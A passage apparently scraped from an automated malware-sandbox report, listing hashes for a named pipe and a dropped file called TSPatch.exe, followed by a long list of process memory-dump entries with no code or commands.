                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\samr

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \Users\Admin\AppData\Local\Temp\foo\TSPatch.exe

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                c558680a720c1e3a317ae3ee9e4bdfda

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                a23b18726297c80b89e3de588666d116920c8f10

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                8c66a900102db758830c47c9e32076fabace6d81bc9ae0b50ba448880f5f1ff8

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                0bc22482c9cf8192a68dcc6c796c7316989f233142ee9ce906dd9408a05dd2c25598d33eaf79e6eccb5d23f95e57948fdfb706b26cf92a839b473e7b24d6955f

                                                                                                                                                                                                                                                                                                              • memory/268-76-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/316-36-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/468-155-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/540-43-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/540-84-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/540-129-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/552-38-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/568-40-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/660-78-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/696-81-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/696-123-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/728-102-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/736-46-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/748-158-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/756-115-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/812-41-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/812-127-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/824-118-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/824-32-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/824-157-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/824-77-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/844-82-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/848-165-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/876-159-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/960-80-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/960-160-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/992-124-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1028-33-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1036-37-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1036-122-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1068-105-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1068-64-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1088-114-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1088-72-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1092-121-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1092-39-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1108-75-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1120-154-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1124-110-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1140-117-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1148-16-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1156-116-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1180-153-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1216-112-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1220-35-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1336-79-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1336-120-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1368-56-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1372-51-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1372-90-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1404-15-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1404-101-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1440-85-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1472-166-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1472-48-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1488-168-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1496-139-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1496-3-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1496-93-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1504-45-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1512-169-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1512-132-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1512-86-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1516-119-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1520-50-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1524-2-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1524-174-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1544-150-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1552-128-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1564-108-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1568-87-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1576-68-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1576-109-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1588-104-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1592-180-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1596-24-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1596-71-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1600-83-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1600-164-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1600-126-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1616-125-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1616-163-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1616-42-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1624-26-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1632-69-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1632-151-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1636-25-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1640-106-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1640-23-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1648-0-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1652-149-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1672-52-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1672-177-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1676-27-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1692-4-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1700-131-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1744-147-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1764-65-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1776-145-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1784-96-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1784-18-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1788-146-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1796-171-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1796-133-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1800-5-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1804-170-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1808-20-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1808-148-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1808-67-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1816-138-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1820-173-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1820-53-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1824-91-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1828-6-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1828-94-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1832-7-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1832-172-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1836-55-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1836-176-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1840-137-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1844-134-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1844-89-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1852-88-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1860-167-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1860-130-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1864-136-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1864-175-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1872-54-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1876-9-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1876-178-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1876-57-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1880-135-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1884-143-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1888-141-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1896-10-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1896-62-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1896-103-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1900-66-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1900-107-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1904-12-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1904-181-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1912-11-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1916-58-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1920-95-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1920-142-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1928-144-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1928-100-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1932-61-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1932-182-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1940-99-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1940-59-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1944-60-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1948-14-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1952-179-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1952-140-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1968-63-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1972-21-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1980-74-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/1988-31-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2000-152-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2000-73-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2020-30-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2032-70-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2032-111-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2040-113-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2040-29-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2044-156-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                              • memory/2044-34-0x0000000000000000-mapping.dmp